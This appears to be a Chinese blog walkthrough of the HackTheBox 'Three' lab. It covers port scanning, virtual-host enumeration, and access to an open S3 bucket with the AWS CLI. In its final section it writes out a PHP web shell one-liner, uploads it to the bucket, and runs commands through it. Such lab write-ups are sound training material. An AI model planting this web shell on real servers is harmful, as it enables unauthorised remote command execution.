目录

  1. 1. 前言
  2. 2. Task1
  3. 3. Task2
  4. 4. Task3
  5. 5. Task4
  6. 6. Task5
  7. 7. Task6
  8. 8. Task7
  9. 9. Task8
  10. 10. Task9
  11. 11. Submit Flag

LOADING

第一次加载文章图片可能会花费较长时间

要不挂个梯子试试?(x

加载过慢请开启缓存 浏览器默认开启

HTB Three

2023/9/24 渗透 HackTheBox
  |     |   总文章阅读量:

前言

第一层 Three

aws的使用

至此,Tier 1 free complete

Task1

How many TCP ports are open?
打开了多少个 TCP 端口?

A:2

开扫

nmap -A 10.129.141.55

image-20230924195423252

开了22和80两个端口


Task2

What is the domain of the email address provided in the "Contact" section of the website?
网站“联系人”部分提供的电子邮件地址的域是什么?

A:thetoppers.htb

访问网站,查看Contact

image-20230924200054285


Task3

In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?
在没有 DNS 服务器的情况下,我们可以使用哪个 Linux 文件将主机名解析为 IP 地址,以便能够访问指向这些主机名的网站?

A:/etc/hosts

把域名写入到hosts,这样我们就能访问了

echo "10.129.141.55 thetoppers.htb" >> /etc/hosts

Task4

Which sub-domain is discovered during further enumeration?
在进一步枚举期间发现哪个子域?

A:s3.thetoppers.htb

爆破子域名

gobuster vhost -u http://thetoppers.htb/ -w /usr/share/wordlists/dirb/big.txt --append-domain

image-20230924210452496

有个404,就是这个了


Task5

Which service is running on the discovered sub-domain?
发现的子域上运行的是哪个服务?

A:amazon s3

将上面的s3子域加入hosts文件中,并访问s3子域(我这里重启了靶机,ip变了

image-20231002213213902

最折磨的部分,因为服务器的s3子域名极不稳定会返回502,我这里等了几十分钟才连上

image-20231002215415179


Task6

Which command line utility can be used to interact with the service running on the discovered sub-domain?
哪个命令行实用程序可用于与发现的子域上运行的服务进行交互?

A:awscli


Task7

Which command is used to set up the AWS CLI installation?
哪个命令用于设置 AWS CLI 安装?

A:aws configure

这里aws报错的需要pip更新一下pyopenssl

安装aws

apt install awscli -y

然后配置

aws configure

image-20231002211028213


Task8

What is the command used by the above utility to list all of the S3 buckets?
上述实用程序使用什么命令列出所有 S3 存储桶?

A:aws s3 ls


Task9

This server is configured to run files written in what web scripting language?
此服务器配置为运行用哪种 Web 脚本语言编写的文件?

A:php


Submit Flag

使用命令通过指定的 S3 端点连接到 s3.thetoppers.htb,然后列出 thetoppers.htb 存储桶中的对象

aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb

image-20231002215647052

接着我们在本地写个马

echo '<?php system($_GET["cmd"]); ?>' > shell.php

传马

aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb

image-20231002215745993

然后访问这个马getshell即可

image-20231002215846634

image-20231002215954175